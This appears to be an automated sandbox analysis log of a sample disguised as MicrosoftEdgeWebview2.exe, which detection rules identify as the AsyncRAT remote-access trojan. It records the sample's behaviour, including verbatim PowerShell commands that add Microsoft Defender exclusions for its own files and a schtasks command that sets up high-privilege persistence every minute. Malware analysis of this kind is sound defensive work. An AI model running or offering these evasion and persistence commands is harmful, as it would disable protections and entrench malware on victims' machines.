            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D90D60_2_00007FFD9B6D90D6
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeCode function: 0_2_00007FFD9B6D1C4D0_2_00007FFD9B6D1C4D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B7830E97_2_00007FFD9B7830E9
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 15_2_00007FFD9B6D12B915_2_00007FFD9B6D12B9
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 15_2_00007FFD9B6D1C4D15_2_00007FFD9B6D1C4D
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 16_2_00007FFD9B6B12B916_2_00007FFD9B6B12B9
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 16_2_00007FFD9B6B1C4D16_2_00007FFD9B6B1C4D
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 17_2_00007FFD9B6B12B917_2_00007FFD9B6B12B9
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 17_2_00007FFD9B6B1C4D17_2_00007FFD9B6B1C4D
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 18_2_00007FFD9B6B12B918_2_00007FFD9B6B12B9
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 18_2_00007FFD9B6B1C4D18_2_00007FFD9B6B1C4D
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeCode function: 20_2_00007FFD9B6C12B920_2_00007FFD9B6C12B9
            Source: MicrosoftEdgeWebview2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: MicrosoftEdgeWebview2.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.MicrosoftEdgeWebview2.exe.8e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1661069038.00000000008E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: MicrosoftEdgeWebview2.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: MicrosoftEdgeWebview2.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: MicrosoftEdgeWebview2.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: MicrosoftEdgeWebview2.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: MicrosoftEdgeWebview2.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/21@1/1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeWebview2.lnkJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeMutant created: \Sessions\1\BaseNamedObjects\4HWCFGdQwjsOjyy9
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exeJump to behavior
            Source: MicrosoftEdgeWebview2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: MicrosoftEdgeWebview2.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: MicrosoftEdgeWebview2.exeVirustotal: Detection: 69%
            Source: MicrosoftEdgeWebview2.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeFile read: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe "C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe"
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftEdgeWebview2.exe'Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeWebview2" /tr "C:\Users\user\AppData\Local\Temp\MicrosoftEdgeWebview2.exe"Jump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\MicrosoftEdgeWebview2.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
